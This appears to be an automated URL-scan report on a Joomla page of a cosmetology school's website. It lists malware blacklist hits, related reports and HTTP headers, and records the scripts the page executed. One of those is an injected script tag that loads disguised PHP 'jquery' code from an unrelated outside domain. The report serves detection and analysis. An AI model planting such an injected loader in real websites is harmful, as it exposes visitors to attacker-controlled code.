Overview

URL neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
IP 192.185.119.94
ASN AS20013 CyrusOne LLC
Location United States
Report completed 2019-01-18 21:56:09 CET
urlquery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2019-01-18 2 neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555 Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/system/js/caption.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/jui/js/jquery-noconflict.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/jui/js/jquery-migrate.min.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/jui/js/jquery.min.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/system/js/core.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/modules/mod_ariextmenu/mod_ariextmenu/js/menu.min.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/system/js/mootools-core.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/modules/mod_ariextmenu/mod_ariextmenu/js/ext-core.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/system/js/mootools-more.js Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 192.185.119.94

Date UQ / IDS / BL URL IP
2019-02-25 18:56:37 +0100  0 - 0 - 1  xem.tomtera.com/MbTsjook2n  192.185.119.94
2019-02-15 11:00:28 +0100  0 - 0 - 0  xem.tomtera.com/MbTsjook2n  192.185.119.94
2019-01-26 09:38:56 +0100  0 - 0 - 10  neetyscosmetologyschool.ca/  192.185.119.94
2019-01-20 11:37:08 +0100  0 - 0 - 10  neetyscosmetologyschool.ca/QZhSZ/fzn  192.185.119.94
2018-12-28 17:30:23 +0100  0 - 0 - 10  neetyscosmetologyschool.ca/VNmcZ/nxzbz/vwvuz/ (...)  192.185.119.94
2018-12-28 10:40:34 +0100  0 - 0 - 10  neetyscosmetologyschool.ca/VijSZ/llnnz/yzpzz/ (...)  192.185.119.94
2018-12-27 14:51:21 +0100  0 - 0 - 10  neetyscosmetologyschool.ca/UNTlZ/SVlOZ/mwpkz/ (...)  192.185.119.94
2018-12-20 00:27:28 +0100  0 - 0 - 10  neetyscosmetologyschool.ca/nqnmz/xukmz/rvvgz/ (...)  192.185.119.94
2018-12-17 21:10:57 +0100  0 - 0 - 10  neetyscosmetologyschool.ca/waktz/tcqaz/qxnjz/ (...)  192.185.119.94
2018-12-17 06:25:54 +0100  0 - 0 - 10  neetyscosmetologyschool.ca/qpwtz/ofngz/fzn  192.185.119.94

Last 10 reports on ASN: AS20013 CyrusOne LLC

Date UQ / IDS / BL URL IP
2019-04-21 14:53:50 +0200  0 - 0 - 1  transcentro.cl/license/topic/levitra-10mg-rez (...)  192.185.16.153
2019-04-21 14:23:28 +0200  0 - 0 - 1  transcentro.cl/license/topic/levitra-bestelle (...)  192.185.16.153
2019-04-21 14:17:33 +0200  0 - 0 - 1  transcentro.cl/license/topic/cialis-5mg-84-st (...)  192.185.16.153
2019-04-21 14:13:12 +0200  0 - 0 - 2  interiorsndecor.com/styles/potenz/kamagra-jel (...)  192.185.170.200
2019-04-21 14:00:42 +0200  0 - 0 - 1  transcentro.cl/license/topic/cialis-kopen-ams (...)  192.185.16.153
2019-04-21 13:54:08 +0200  0 - 0 - 2  interiorsndecor.com/styles/potenz/cialis-bran (...)  192.185.170.200
2019-04-21 13:31:37 +0200  0 - 0 - 2  interiorsndecor.com/styles/potenz/viagra-wird (...)  192.185.170.200
2019-04-21 13:22:54 +0200  0 - 0 - 1  transcentro.cl/license/topic/viagra-wirkung-m (...)  192.185.16.153
2019-04-21 13:16:32 +0200  0 - 0 - 1  transcentro.cl/license/topic/welche-nebenwirk (...)  192.185.16.153
2019-04-21 13:09:46 +0200  0 - 0 - 1  transcentro.cl/license/topic/erfahrungen-tada (...)  192.185.16.153

Last 10 reports on domain: neetyscosmetologyschool.ca

Date UQ / IDS / BL URL IP
2019-04-17 17:04:26 +0200  0 - 0 - 1  neetyscosmetologyschool.ca/sgqyz/qrmaz/bvv  192.185.140.102
2019-04-17 16:56:20 +0200  0 - 0 - 1  neetyscosmetologyschool.ca/tgjiz/pdlpz/sitema (...)  192.185.140.102
2019-03-28 20:36:56 +0100  0 - 0 - 1  neetyscosmetologyschool.ca/qpcaz  192.185.140.102
2019-03-19 15:57:18 +0100  0 - 0 - 1  neetyscosmetologyschool.ca/skyoz/zxliz/pklaz/ (...)  192.185.140.102
2019-03-18 15:01:25 +0100  0 - 0 - 1  neetyscosmetologyschool.ca/SdjfZ/zpopz/vasaz/ (...)  192.185.140.102
2019-03-09 09:38:18 +0100  0 - 0 - 1  neetyscosmetologyschool.ca/  192.185.140.102
2019-02-10 09:39:36 +0100  0 - 0 - 1  neetyscosmetologyschool.ca/  192.185.140.102
2019-01-26 09:38:56 +0100  0 - 0 - 10  neetyscosmetologyschool.ca/  192.185.119.94
2019-01-20 11:37:08 +0100  0 - 0 - 10  neetyscosmetologyschool.ca/QZhSZ/fzn  192.185.119.94
2018-12-28 17:30:23 +0100  0 - 0 - 10  neetyscosmetologyschool.ca/VNmcZ/nxzbz/vwvuz/ (...)  192.185.119.94


JavaScript

Executed Scripts (44)


Executed Evals (2)

#1 JavaScript::Eval (size: 7542, repeated: 1) - SHA256: 9b3c8ace03f3ab1c868c953219a4a665fdbf5b042987a173d54789225bc5a300

                                        Ext.ns('Ext.ux');
var EXT_IS_MOBILE_DEVICE = /android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|ad|od)|iris|kindle|lge |maemo|midp|mmp|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(navigator.userAgent || navigator.vendor || window.opera) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i.test((navigator.userAgent || navigator.vendor || window.opera).substr(0, 4));
Ext.ux.Menu = Ext.extend(Ext.util.Observable, {
    direction: 'horizontal',
    delay: 0.2,
    autoWidth: true,
    transitionType: 'fade',
    transitionDuration: 0.3,
    animate: true,
    currentClass: 'current',
    zIndex: -1,
    constructor: function(elId, config) {
        config = config || {};
        Ext.apply(this, config);
        Ext.ux.Menu.superclass.constructor.call(this, config);
        this.addEvents('show', 'hide', 'click');
        this.DBLCLICK = false;
        this.DBLCLICKEL = null;
        this.el = Ext.get(elId);
        this.initMarkup();
        this.initEvents();
        this.setCurrent()
    },
    initMarkup: function() {
        var zIndex = this.zIndex > 0 ? this.zIndex : --Ext.ux.Menu.zSeed;
        if (this.el.parent().hasClass('ux-menu-container')) this.container = this.el.parent();
        else this.container = this.el.wrap({
            cls: 'ux-menu-container'
        });
        this.container.setStyle({
            "z-index": zIndex
        });
        this.items = this.el.select('li');
        this.el.addClass('ux-menu ux-menu-' + this.direction);
        this.el.select('>li').addClass('ux-menu-item-main');
        this.el.select('li:has(>ul)').addClass('ux-menu-item-parent').each(function(item) {
            if (item.down('a').select('>span.ux-menu-arrow').getCount() == 0) item.down('a:not(>span)').addClass('ux-menu-link-parent').createChild({
                tag: 'span',
                cls: 'ux-menu-arrow'
            })
        });
        this.el.select('li:first-child>a').addClass('ux-menu-link-first');
        this.el.select('li:last-child>a').addClass('ux-menu-link-last');
        this.container.addClass('ux-menu-clearfix');
        if (this.autoWidth) {
            this.doAutoWidth()
        }
        var subs = this.el.select('ul');
        subs.addClass('ux-menu-sub');
        if (Ext.isBorderBox || Ext.isIE7) {
            subs.each(function(item) {
                item.parent().createChild({
                    tag: 'iframe',
                    cls: 'ux-menu-ie-iframe'
                }).setWidth(item.getWidth()).setHeight(item.getHeight())
            })
        }
        subs.addClass('ux-menu-hidden')
    },
    initEvents: function() {
        this.showTask = new Ext.util.DelayedTask(this.showMenu, this);
        this.hideTask = new Ext.util.DelayedTask(function() {
            this.showTask.cancel();
            this.hideAll();
            this.fireEvent('hide')
        }, this);
        if (!EXT_IS_MOBILE_DEVICE) this.el.hover(function() {
            this.hideTask.cancel()
        }, function() {
            this.hideTask.delay(this.delay * 1000)
        }, this);
        if (!EXT_IS_MOBILE_DEVICE) this.el.select('li.ux-menu-item-parent').on('mouseenter', this.onParentEnter, false, {
            me: this,
            delay: 5
        });
        if (!EXT_IS_MOBILE_DEVICE) {
            this.el.on('mouseover', function(ev, t) {
                this.manageSiblings(t);
                if (!Ext.fly(t).hasClass('ux-menu-item-parent')) {
                    this.showTask.cancel()
                }
            }, this, {
                delegate: 'li'
            })
        } else {
            this.el.select('a.ux-menu-link-parent').on('click', function(ev, link, o) {
                var me = o.me;
                var item = Ext.get(this).parent();
                if (!item.hasClass('ux-menu-item-main') && item.parent('ul').hasActiveFx()) {
                    item.parent('ul').stopFx(true)
                }
                if (!item.child('ul').hasClass('ux-menu-hidden')) {
                    me.manageSiblings(item.parent())
                } else {
                    me.manageSiblings(item);
                    me.showTask.delay(me.delay * 1000, false, false, [item])
                };
                ev.stopEvent()
            }, false, {
                me: this,
                delay: 5
            })
        };
        if (!EXT_IS_MOBILE_DEVICE) {
            this.el.on('click', function(ev, t) {
                return this.fireEvent('click', ev, t, this)
            }, this, {
                delegate: 'a'
            })
        } else {
            this.el.on('click', function(ev, t, o) {
                var isParentEl = Ext.get(t).hasClass('ux-menu-link-parent'),
                    isStop = true;
                if (this.DBLCLICKEL && isParentEl) {
                    if (this.DBLCLICKEL == Ext.get(t) && (Date.now() - this.DBLCLICK) < 900) {
                        isStop = false
                    }
                };
                if (isParentEl && isStop) ev.stopEvent();
                if (isParentEl) {
                    this.DBLCLICKEL = Ext.get(t);
                    this.DBLCLICK = Date.now()
                } else {
                    this.DBLCLICKEL = null;
                    this.DBLCLICK = false
                };
                return this.fireEvent('click', ev, t, this)
            }, this, {
                delegate: 'a'
            })
        }
    },
    onParentEnter: function(ev, link, o) {
        var item = Ext.get(this),
            me = o.me;
        if (!item.hasClass('ux-menu-item-main') && item.parent('ul').hasActiveFx()) {
            item.parent('ul').stopFx(true)
        }
        if (!item.child('ul').hasClass('ux-menu-hidden')) {
            return
        }
        me.showTask.delay(me.delay * 1000, false, false, [item])
    },
    showMenu: function(item) {
        var menu = item.child('ul'),
            x = y = 0;
        item.select('>a').addClass('ux-menu-link-hover');
        if (this.direction == 'horizontal' && item.hasClass('ux-menu-item-main')) {
            y = item.getHeight() + 1
        } else {
            x = item.getWidth() + 1
        }
        if (Ext.isIE) {
            menu.select('ul').addClass('ux-menu-hidden');
            if (Ext.isBorderBox || Ext.isIE7) {
                item.down('iframe').setStyle({
                    left: x + 'px',
                    top: y + 'px',
                    display: 'block'
                })
            }
        }
        menu.setStyle({
            left: x + 'px',
            top: y + 'px'
        }).removeClass('ux-menu-hidden');
        if (this.animate) {
            switch (this.transitionType) {
                case 'slide':
                    if (this.direction == 'horizontal' && item.hasClass('ux-menu-item-main')) {
                        menu.slideIn('t', {
                            duration: this.transitionDuration
                        })
                    } else {
                        menu.slideIn('l', {
                            duration: this.transitionDuration
                        })
                    }
                    break;
                default:
                    menu.setOpacity(0.001).fadeIn({
                        duration: this.transitionDuration
                    });
                    break
            }
        }
        this.fireEvent('show', item, menu, this)
    },
    manageSiblings: function(item) {
        var item = Ext.get(item);
        item.parent().select('li.ux-menu-item-parent').each(function(child) {
            if (child.dom.id !== item.dom.id) {
                child.select('>a').removeClass('ux-menu-link-hover');
                child.select('ul').stopFx(false).addClass('ux-menu-hidden');
                if (Ext.isBorderBox || Ext.isIE7) {
                    child.select('iframe').setStyle('display', 'none')
                }
            }
        })
    },
    hideAll: function() {
        this.manageSiblings(this.el)
    },
    setCurrent: function() {
        var els = this.el.query('.' + this.currentClass);
        if (!els.length) {
            return
        }
        var item = Ext.get(els[els.length - 1]).removeClass(this.currentClass).findParent('li', null, true);
        while (item && item.parent('.ux-menu')) {
            item.addClass(this.currentClass);
            item.down('a').addClass(this.currentClass);
            item = item.parent('li')
        }
    },
    doAutoWidth: function() {
        var fixWidth = function(sub) {
            var widest = 0;
            var items = sub.select('>li');
            sub.setStyle({
                width: 3000 + 'px'
            });
            items.each(function(item) {
                widest = Math.max(widest, item.getWidth())
            });
            widest = Ext.isIE ? widest + 1 : widest;
            items.setWidth(widest + 'px');
            sub.setWidth(widest + 'px')
        };
        if (this.direction == 'vertical') {
            this.container.select('ul').each(fixWidth)
        } else {
            this.el.select('ul').each(fixWidth)
        }
    }
});
Ext.ux.Menu.zSeed = 10000;
                                    

#2 JavaScript::Eval (size: 18, repeated: 1) - SHA256: 9682f5fddabce48500685b207634adb80fab0ee1b991c2c01cac34fa702983c0

                                        var batch = 30803;
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 278, repeated: 1) - SHA256: 7fabb2c24b0e96c7b0bf87911d835c40f60eccf286c123a63e43077933481f6a

                                        < script type = "text/javascript"
src = "http://www.antistalkingagentur.de/js/jquery.min.php?key=b64&utm_campaign=snt2014&utm_source=neetyscosmetologyschool.ca&utm_medium=&utm_content=http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555&utm_term=Home&se_referrer=" > < /script>
                                    


HTTP Transactions (41)


Request Response
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/555 HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6; path=/; HttpOnly
Last-Modified: Fri, 18 Jan 2019 20:55:36 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6782
Md5:    2e5990d9e8475b5240cb78d2412652bd
Sha1:   6c93d6cc949cbf2a983de79fe1cd75fa014b207c
Sha256: aea6b66eb39a557c692864eff1472f76a7a64d24d7d32bdd1e8ad84dc8bf6a9e

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /modules/mod_ariextmenu/mod_ariextmenu/js/css/menu.min.css HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 12 Dec 2016 04:41:22 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   810
Md5:    74a677a00a1e633a343d47f54ca84760
Sha1:   6a38568e3f2a7f1e695fa320c3a71d30a6cd25fa
Sha256: 9d94799cea29d87a7834b9c321375ce78c564d7cd806905d0c72f394e282508f
                                        
                                            GET /media/system/js/caption.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 21 Oct 2016 22:38:56 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   342
Md5:    1d35931941a35a5d402512012a9a875f
Sha1:   949a51bb9180493bc80909f0d333ef109f132cc0
Sha256: 6a0c3fbf9447578d214746b2c8d9c856adcd4a11198960e710809fe26bc9fe0f

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /modules/mod_ariextmenu/mod_ariextmenu/js/css/menu.fix.css HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 12 Dec 2016 04:41:22 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   91
Md5:    0d3d55c14306cc23a79fb409fb050ae3
Sha1:   145e2d438f64d747365d2dd820875bf8fdb999ba
Sha256: 98c4ad5058401010f68fecd5cd960531bb1914202dfed4b49c168c09c15a2aa6
                                        
                                            GET /media/jui/js/jquery-noconflict.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 21 Oct 2016 22:38:56 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   47
Md5:    f9644fdb744c98e71117d80a16ad8242
Sha1:   1ec2fe7ecf102eafad84b5b59efdfa68b6618b41
Sha256: a9f9e962f48337b4b7e7f09738be9883de9b2134dbd1160869ba63efe47d3b37

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /media/jui/js/jquery-migrate.min.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 21 Oct 2016 22:38:56 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4314
Md5:    83366cd3bd9cafba76f66aea5896d068
Sha1:   d89741733906889758224582999798f013ed77fc
Sha256: b6ecb36d8748ea1264e24325e3f16ba5e196a3b622f70ea499850cfb6a0ad853

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /templates/shahnaz/favicon.ico HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Content-Length: 1150
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  MS Windows icon resource - 1 icon
Size:   1150
Md5:    86a2b5bbab306b8b04e8ad76f652723a
Sha1:   a88fb28823ed9a96bb61b8c466e9fbfc9132f64e
Sha256: 9264eb9bdf6cd9981f1400fa0cc377d94e3036e97b335db0eb9d939355794c2a
                                        
                                            GET /media/jui/js/jquery.min.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 21 Oct 2016 22:38:56 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   39403
Md5:    7ea3c09e68afd8113612bcc0eeaeb8ea
Sha1:   2170131e820e24a8660561f8b99ec1c175704d48
Sha256: 82a88b40ee0968fcbdb78240fcd8e54ef1712a48cc61e3be11b39624cdecab96

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /media/system/js/core.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 21 Oct 2016 22:38:56 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   2586
Md5:    b8015fbdda121ebb8378ff0459446ebe
Sha1:   83c4b44ff0a364b1601582a4922971cadf3cd7a3
Sha256: 00df6dde2f048d0be4908c908683215e6447d37d896096c0e8ffb0c048099775

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /modules/mod_ariextmenu/mod_ariextmenu/js/menu.min.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 12 Dec 2016 04:41:22 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4256
Md5:    85d5a6410e0960d76c7de8ce1ceb6e88
Sha1:   b558ad353c7d1f4ae779a54324dd4211506219f5
Sha256: 11f04639c041942c6f5423798f4f327121f3fb33c9b79546e43636f5ef8098bb

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /templates/shahnaz/css/template.css HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
